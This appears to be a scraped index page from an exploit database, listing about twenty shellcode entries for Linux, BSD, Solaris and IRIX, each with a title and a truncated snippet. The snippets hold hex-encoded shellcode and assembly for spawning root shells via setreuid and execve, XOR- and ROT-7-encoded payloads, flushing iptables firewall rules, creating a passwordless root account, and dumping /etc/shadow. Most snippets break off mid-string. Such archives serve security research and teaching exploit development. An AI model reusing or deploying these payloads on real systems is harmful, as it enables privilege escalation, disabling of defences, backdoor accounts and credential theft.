Linux/x86 - execve() Using JMP-FSTENV Shellcode (67 bytes)

Linux/x86 - execve Using JMP-FSTENV Shellcode 67 bytes. Shellcode exploit for Linuxx86 platform ;Description: JMP-FSTENV execve shell 67 bytes ;Shellcode:...

Linux/SPARC - setreuid(0,0) + execve(/bin/sh) Shellcode (64 bytes)

Linux/SPARC - setreuid0,0 + execve/bin/sh Shellcode 64 bytes. Shellcode exploit for LinuxSPARC platform / Linux/SPARC setreuid0,0; execve of /bin/sh shellcode. / char c0de = / anathema / / setreuid0,0; / "\x82\x10\x20\x7e" / mov 126, %g1 / "\x92\x22\x40\x09" / sub %o1, %o1, %o1 / "\x90\x0a\x40\x0...

Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes)

Linux/x86 - execve/bin/sh + Using jump/call/pop Shellcode 52 bytes. Shellcode exploit for Linuxx86 platform ;Description: JMP-CALL-POP execve shell 52 bytes ;Shellcode:...

Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)

Linux/x86 - execve/bin/sh Shellcode 21 bytes 3. Shellcode exploit for Linuxx86 platform / Title: linux/x86 Shellcode execve "/bin/sh" - 21 Bytes Date : 10 Feb 2011 Author : kernelpanik Thanks : cOokie, agix, antrhacks / / xor ecx, ecx mul ecx push ecx push 0x68732f2f ;; hs// push 0x6e69622f ;; ni...

Linux/x86 - execve(/sbin/iptables -F) Shellcode (70 bytes)

Linux/x86 - execve/sbin/iptables -F Shellcode 70 bytes. Shellcode exploit for Linuxx86 platform Author: zillion Email: [email protected] Home: http://www.safemode.org Linux x86 shellcode that does an execve of /sbin/iptables -F in order to flush activated firewall rules. File:...

Linux/x86 - execve(/bin/sh) Shellcode (28 bytes)

Linux/x86 - execve/bin/sh Shellcode 28 bytes. Shellcode exploit for Linuxx86 platform / Title: Linux x86 execve"/bin/sh" - 28 bytes Author: Jean Pascal Pereira Web: http://0xffe4.org Disassembly of section .text: 08048060 : 8048060: 31 c0 xor %eax,%eax 8048062: 50 push %eax 8048063: 68 2f 2f 73 6...

Linux/x86-64 - setreuid(0,0) + execve(/bin/zsh, [/bin/zsh, NULL]) + XOR Encoded Shellcode (87 bytes)

Linux/x86-64 - setreuid0,0 + execve/bin/zsh, /bin/zsh, NULL + XOR Encoded Shellcode 87 bytes. Shellcode exploit for Linuxx86-64 platform Title: Linux x86-64 setreuid 0,0 & execve"/bin/zsh", "/bin/zsh", NULL + XOR encoded - 87 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware...

Linux/x86 - execve() + ROT-7 Shellcode (Encoder/Decoder) (74 bytes)

Linux/x86 - execve + ROT-7 Shellcode Encoder/Decoder 74 bytes. Shellcode exploit for Linuxx86 platform / ROT-7 Decoder Shellcode - Linux Intel/x86 Author: Stavros Metzidakis / a Python ROT-7 encoder for shellcode execve-stack...

Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes)

Linux/x86 - Add Root User w000t + No Password Shellcode 177 bytes. Shellcode exploit for Linuxx86 platform Linux x86 shellcode that uses execve and echo to create a passwordless root account. Author: zillion Email : [email protected] Homepage: safemode.org File: w000t-shell.c / This shellcode...

IRIX - execve(/bin/sh) Shellcode (43 bytes)

IRIX - execve/bin/sh Shellcode 43 bytes. Shellcode exploit for IRIX platform char shellcode= "\x04\x10\xff\xff" / bltzal $zero, / "\x24\x02\x03\xf3" / li $v0,1011 / "\x23\xff\x02\x14" / addi $ra,$ra,532 / "\x23\xe4\xfe\x08" / addi $a0,$ra,-504 / "\x23\xe5\xfe\x10" / addi $a1,$ra,-496 /...

Linux/SPARC - setreuid(0,0) + execve() Shellcode (72 bytes)

Linux/SPARC - setreuid0,0 + execve Shellcode 72 bytes. Shellcode exploit for LinuxSPARC platform / Linux/SPARC setreuid0, 0; necessary, /bin/sh drops privs, standard execve. / char c0de = / by michel kaempf / / setuid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10" / setgid 0 ; /...

Linux/x86 - execve(/bin/sh,0,0) Shellcode (21 bytes)

Linux/x86 - execve/bin/sh,0,0 Shellcode 21 bytes. Shellcode exploit for Linuxx86 platform / linux/x86 execve"/bin/sh",0,0 21 bytes http://www.gonullyourself.org sToRm / char shellcode = // "\x31\xc9" // xor %ecx,%ecx "\xf7\xe1" // mul %ecx "\x51" // push %ecx "\x68\x2f\x2f\x73\x68" // push...

FreeBSD/x86-64 - execve(/bin/sh) Shellcode (28 bytes)

FreeBSD/x86-64 - execve/bin/sh Shellcode 28 bytes. Shellcode exploit for FreeBSDx86-64 platform / Gitsnik, @dracyrys FreeBSD x8664 execve, 28 bytes / C source: char code = \ "\x48\x31\xc9\x48\xf7\xe1\x04\x3b\x48\xbb" "\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53" "\x54\x5f\x52\x57\x54\x5e\x0f\x05";...

Linux/x86 - setreuid(0,0) + execve("/bin/zsh", [/bin/zsh, NULL]) + XOR Encoded Shellcode (53 bytes)

Linux/x86 - setreuid0,0 + execve"/bin/zsh", /bin/zsh, NULL + XOR Encoded Shellcode 53 bytes. Shellcode exploit for Linuxx86 platform Title: Linux x86 setreuid 0,0 & execve"/bin/zsh", "/bin/zsh", NULL + XOR encoded - 53 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware 13.37...

Linux/x86-64 - setreuid(0,0) + execve(/bin/ksh, [/bin/ksh, NULL]) + XOR Encoded Shellcode (87 bytes)

Linux/x86-64 - setreuid0,0 + execve/bin/ksh, /bin/ksh, NULL + XOR Encoded Shellcode 87 bytes. Shellcode exploit for Linuxx86-64 platform Title: Linux x86-64 setreuid 0,0 & execve"/bin/ksh", "/bin/ksh", NULL + XOR encoded - 87 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware...

BSD/x86 - execve(/bin/sh) + seteuid(0) Shellcode (31 bytes)

BSD/x86 - execve/bin/sh + seteuid0 Shellcode 31 bytes. Shellcode exploit for BSDx86 platform / simply execvebinsh+seteuid0 shellcode in 31 bytes written on nasm - my first nasm exp. greetz2: mig darknet /EFnet.org nerf nerf /EFnet.org dev0id rus-sec /EFnet.org rootteam.void.ru / char shellcode =...

Solaris/SPARC - setreuid(geteuid()) + setregid(getegid()) + execve(/bin/sh) Shellcode

Solaris/SPARC - setreuidgeteuid + setregidgetegid + execve/bin/sh Shellcode. Shellcode exploit for SolarisSPARC platform / Solaris shellcode - setreuidgeteuid, setregidgetegid, execve /bin/sh Claes M. Nyberg 20020124 , / include static char solariscode = / geteuid / "\x82\x10\x20\x18" / mov 24, %...

Linux/x86 - setuid() + execve() + exit() Shellcode (44 bytes)

Linux/x86 - setuid + execve + exit Shellcode 44 bytes. Shellcode exploit for Linuxx86 platform / Linux x86 shellcode by bob / / setuid; execve; exit; / include char shellcode= "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80" "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f"...

solaris/x86 setuid(0) execve(/bin/cat /etc/shadow) exit(0) 59 bytes

No description provided by source. / ; sm4x 2008 ; /bin/cat /etc/shadow ; 59 bytes ; SunOS sol01 5.11 snv86 i86pc i386 i86pc Solaris ; port to SunOS to pwn a b0x - thank god for that default unix CRYPTDEFAULT!!!! ; this is what happens when ur work takes away root pirv on a SunOS box :-/ global...

solaris/x86 setuid(0), execve(/bin/cat, /etc/shadow), exit(0) 59 bytes

Exploit for solaris/x86 platform in category shellcode ====================================================================== solaris/x86 setuid0, execve/bin/cat, /etc/shadow, exit0 59 bytes ====================================================================== / ; sm4x 2008 ; /bin/cat /etc/shado...